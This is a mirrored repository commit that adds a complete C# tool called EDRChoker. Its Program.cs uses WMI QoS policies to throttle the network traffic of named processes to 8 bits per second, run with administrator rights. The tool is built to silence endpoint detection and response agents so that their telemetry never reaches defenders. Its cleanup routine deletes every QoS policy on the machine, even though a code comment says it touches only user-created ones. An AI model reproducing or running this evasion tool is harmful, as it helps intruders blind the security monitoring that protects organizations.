Mirrors/twosevenonet-edrchoker
1
0
Fork 0
mirror of https://github.com/TwoSevenOneT/EDRChoker synced 2026-06-08 15:47:19 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add project files.

Browse Source
This commit is contained in:
2x7EQ13
2026-06-07 15:48:52 +07:00
parent 832c64060c
commit e103030ddd
6 changed files with 315 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
App.config
+6
View File
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
</startup>
</configuration>
EDRChoker.csproj
+55
View File
@@ -0,0 +1,55 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C9F67410-04D8-4DBC-BFFE-23996A9986C5}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>EDRChoker</RootNamespace>
<AssemblyName>EDRChoker</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Utils.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
EDRChoker.sln
+25
View File
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.13.35825.156 d17.13
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EDRChoker", "EDRChoker.csproj", "{C9F67410-04D8-4DBC-BFFE-23996A9986C5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C9F67410-04D8-4DBC-BFFE-23996A9986C5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {8A4A37A4-F054-4528-9933-D01DFFCD09DF}
EndGlobalSection
EndGlobal
Program.cs
+141
View File
@@ -0,0 +1,141 @@
using System;
using System.Management;
using System.IO;
using EDRChoker;
namespace QosPolicyExample
{
class Program
{
static void Main(string[] args)
{
Utils utils = new Utils();
utils.ShowBanner();
// Verify Administrative permissions
if (!utils.IsRunningAsAdmin())
{
Console.WriteLine("ERROR: Elevated privileges required.");
return;
}
if (args.Length > 0)
{
utils.ReadCleanFile(args[0]);
if (utils.procName.Length == 0)
{
Console.WriteLine("No valid process names found in the file.");
return;
}
foreach (string proc in utils.procName)
{
Console.WriteLine($"THROTTLING! Process: {proc}");
CreateThrottleCurlPolicyPureWmi(proc);
}
}
else
{
//clear
Console.WriteLine("DO CLEAR...\n");
RemoveAllThrottleCurlPoliciesPureWmi();
}
//end main
}
static void CreateThrottleCurlPolicyPureWmi(string procName)
{
try
{
var scope = new ManagementScope(@"\\.\ROOT\StandardCimv2");
scope.Connect();
var managementPath = new ManagementPath("MSFT_NetQosPolicySettingData");
var policyClass = new ManagementClass(scope, managementPath, null);
// Construct a raw, detached memory object mapping the exact schema fields
ManagementObject newPolicy = policyClass.CreateInstance();
newPolicy["Owner"] = 1;
string guid = Guid.NewGuid().ToString();
string policyName = Path.GetRandomFileName().Replace(".", "").Substring(0, 8);
newPolicy["Name"] = policyName;
// Use this to force the policy to be treated as a new, unique instance in the active store without conflicts
// this will apply the policy directly to the active store. Affect immediately
newPolicy["InstanceID"] = $"{guid}\\{policyName}\\ActiveStore";
newPolicy["AppPathNameMatchCondition"] = procName;
newPolicy["IPProtocolMatchCondition"] = 3U; // 3 = Both TCP/UDP (uint32)
newPolicy["NetworkProfile"] = 0U; // 0 = All profiles (uint32)
// 3. Throttle Actions (Matching your exact MOF structure: uint64 in Bytes per second)
// 8 Bits/sec
newPolicy["ThrottleRateAction"] = 8UL;
var putOptions = new PutOptions
{
Type = PutType.CreateOnly
};
newPolicy.Put(putOptions);
Console.WriteLine($"SUCCESS! Policy {policyName} registered");
}
catch (ManagementException ex)
{
Console.WriteLine($" Message : {ex.Message}");
Console.WriteLine($" ErrorCode : {ex.ErrorCode}");
}
catch (Exception ex)
{
Console.WriteLine($"\nUnexpected error: {ex.Message}");
}
}
//
static void RemoveAllThrottleCurlPoliciesPureWmi()
{
try
{
var scope = new ManagementScope(@"\\.\ROOT\StandardCimv2");
scope.Connect();
// Query only user-created policies (Owner = 1) to protect system defaults
var query = new ObjectQuery("SELECT * FROM MSFT_NetQosPolicySettingData");
using (var searcher = new ManagementObjectSearcher(scope, query))
using (var queryCollection = searcher.Get())
{
if (queryCollection.Count == 0)
{
Console.WriteLine("No custom QoS policies found to remove.");
return;
}
foreach (ManagementObject policy in queryCollection)
{
string policyName = policy["Name"]?.ToString() ?? "Unknown";
Console.WriteLine($"REMOVING... {policyName}");
// Delete the instance from the WMI repository
policy.Delete();
Console.WriteLine($"REMOVED! {policyName}");
}
}
}
catch (ManagementException ex)
{
Console.WriteLine($"WMI Error: {ex.Message}");
Console.WriteLine($"ErrorCode: {ex.ErrorCode}");
}
catch (Exception ex)
{
Console.WriteLine($"Unexpected error: {ex.Message}");
}
}
//
}
}
Properties/AssemblyInfo.cs
+33
View File
@@ -0,0 +1,33 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("EDRChoker")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("EDRChoker")]
[assembly: AssemblyCopyright("Copyright © 2026")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("c9f67410-04d8-4dbc-bffe-23996a9986c5")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
Utils.cs
+55
View File
@@ -0,0 +1,55 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Security.Principal;
namespace EDRChoker
{
class Utils
{
public string[] procName;
public void ReadCleanFile(string filePath)
{
try
{
procName = File.ReadLines(filePath)
.Select(line => line.Trim())
.Where(trimmedLine => !string.IsNullOrEmpty(trimmedLine))
.ToArray();
}
catch (Exception ex)
{
Console.WriteLine($"File error: {ex.Message}");
procName = Array.Empty<string>();
}
}
public void ShowBanner()
{
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine(@" ___ ___ ___ ___ _ _ ___ _ _____ ___ ");
Console.WriteLine(@" | __| \| _ \/ __| |_| |/ _ \| |/ / __| _ \");
Console.WriteLine(@" | _|| |) | / (__| _ | (_) | ' <| _|| /");
Console.WriteLine(@" |___|___/|_|_\\___|_| |_|\___/|_|\_\___|_|_\");
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine("\n EDRChoker: You can pass, but just a little");
// Made bright using ConsoleColor.White
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine(" Two Seven One Three: x.com/TwoSevenOneT\n");
Console.ResetColor();
}
public bool IsRunningAsAdmin()
{
using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
{
WindowsPrincipal principal = new WindowsPrincipal(identity);
return principal.IsInRole(WindowsBuiltInRole.Administrator);
}
}
}
}